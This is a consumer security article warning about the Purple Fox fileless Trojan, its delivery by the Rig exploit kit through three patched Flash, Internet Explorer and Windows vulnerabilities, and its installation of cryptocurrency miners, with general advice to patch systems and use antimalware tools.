Purple Fox is a vicious Trojan that can avoid detection and infect attacked computers with cryptocurrency miners and other malicious programs. No doubt, no one would like to receive such a threat, which is why we recommend reading our full report so you could learn how to protect your computer from it. Researchers believe that the malware could infect machines of both regular home users and various organizations. Since detecting the malware might be a tough task, you can imagine that erasing it could be even more challenging. This is why this time, we are not adding manual deletion instructions at the end of this article. Victims of this Trojan are advised to seek the assistance of cybersecurity specialists who could remove Purple Fox for them or use advanced antimalware software that would be capable of detecting and erasing such a threat.
While it might be tricky to detect Purple Fox, we can tell what kind of devices it might target. Trend Micro specialists who have researched this malicious application in detail discovered that it is being dropped on systems by the Rig exploit kit. This tool can exploit CVE-2018-15982, CVE-2014-6332, and CVE-2018-8174 vulnerabilities. The first weakness can be found on particular Adobe Flash versions, the second one is located on old Internet Explorer variants, and the third one could be affecting different Windows versions.
All of the listed vulnerabilities have been already patched, which means all that users need to do to ensure that threats like the Rig exploit kit could not misuse them is to download and apply necessary patches. Some users are hesitant to install patches because they think it might be a waste of time. In truth, getting updates regularly might save you time that you would have to spend to figure out what happened to your computer and how to fix it if a threat like Purple Fox manages to sneak in.
Besides, users should know that the Rig exploit kit might be spread via suspicious pop-ups or other advertisements or unreliable websites. After a victim interacts with such content, it checks if a computer has one of the weaknesses it can exploit. If the malware succeeds, it should launch Purple Fox. Specialists discovered that this Trojan could run on a system without having to download or create any data. Consequently, security tools that detect threats by searching for malicious files might fail to detect it. Such malicious software is called fileless malware. Instead of creating files, such threats run machines by abusing tools that are already running. For instance, Purple Fox abuses PowerShell.
As said earlier, this malware can infect a device with various other malicious applications. Researchers say that it mainly distributed cryptocurrency-mining tools. Hackers use such software to generate cryptocurrencies for themselves by using an infected device’s resources. Such activities may have visible effects on a machine as it could slow down its performance. If your computer’s performance is important to you, it is best to take care of such threats as fast as possible.
All in all, due to the Purple Fox’s capability to avoid detection, many users might not realize it is on their system. However, if you have the earlier mentioned vulnerabilities and you sometimes interact with unreliable ads or websites, you should keep it in mind that you could be targeted. Naturally, we recommend patching weakness that your computer might have at once. Also, we advise being more cautious while surfing the Internet. It might also help to keep a reputable antimalware tool that could protect your device against Trojans and other malicious applications.
Johnlery Triunfante and Earle Earnshaw. September 9, 2019. ‘Purple Fox’ Fileless Malware with Rookit Component Delivered by Rig Exploit Kit Now Abuses PowerShell. Trend Micro.